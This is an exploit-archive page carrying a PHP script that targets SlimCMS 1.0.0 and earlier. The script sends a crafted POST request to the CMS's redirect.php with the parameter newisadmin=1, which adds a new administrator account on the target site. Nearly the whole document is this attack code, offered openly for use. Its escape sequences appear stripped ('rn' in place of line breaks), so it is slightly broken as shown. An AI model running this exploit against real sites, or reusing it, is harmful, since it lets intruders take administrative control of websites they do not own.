[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : SlimCMS <= 1.0.0 (redirect.php) Privilege Escalation Exploit
# Published : 2008-10-10
# Author : StAkeR
# Previous Title : Easynet4u Link Host (cat_id) SQL Injection Vulnerability
# Next Title : Kusaba <= 1.0.4 Remote Code Execution Exploit
#!/usr/bin/php -q
<?php
/*
SlimCMS <= 1.0.0 Privilege Escalation Exploit
Discovered By StAkeR aka athos - StAkeR[at]hotmail[dot]it
Discovered On 11/10/2008
http://downloads.sourceforge.net/slimcms/SlimCMS-1.0.0.tgz?modtime=1217343227&big_mirror=0
*/
error_reporting(0);
$host = $argv[1];
$host = str_replace('http://',NULL,$host);
$path = $argv[2]."/redirect.php";
$user = $argv[3];
if(!preg_match('/http://(.+?)$/',$host) and strlen($user) < 5)
{
echo "[?] Usage: php $argv[0][host][path][username]rn";
echo "[?] Usage: php $argv[0] http://localhost /cms milw0rmrn";
exit;
}
if(!$sock = fsockopen($host,80))
{
die("Socket Errorrn");
}
$post .= "newusername=$user&newpassword=$user&newisadmin=1";
$data .= "POST /$path HTTP/1.1rn";
$data .= "Host: $hostrn";
$data .= "User-Agent: Mozilla/4.5 [en] (Win95; U)rn";
$data .= "Content-Type: application/x-www-form-urlencodedrn";
$data .= "Content-Length: ".strlen($post)."rn";
$data .= "Connection: closernrn";
$data .= "$postrnrn";
fputs($sock,$data);
while(!feof($sock))
{
$content .= fgets($sock);
} fclose($sock);
if(eregi('change.php',$content))
{
echo "[?] Added New Administrator!rn";
echo "[?] Username and Password: $userrn";
exit;
}
else
{
echo "[?] Exploit Failed!n";
}
?>
# www.Syue.com [2008-10-10]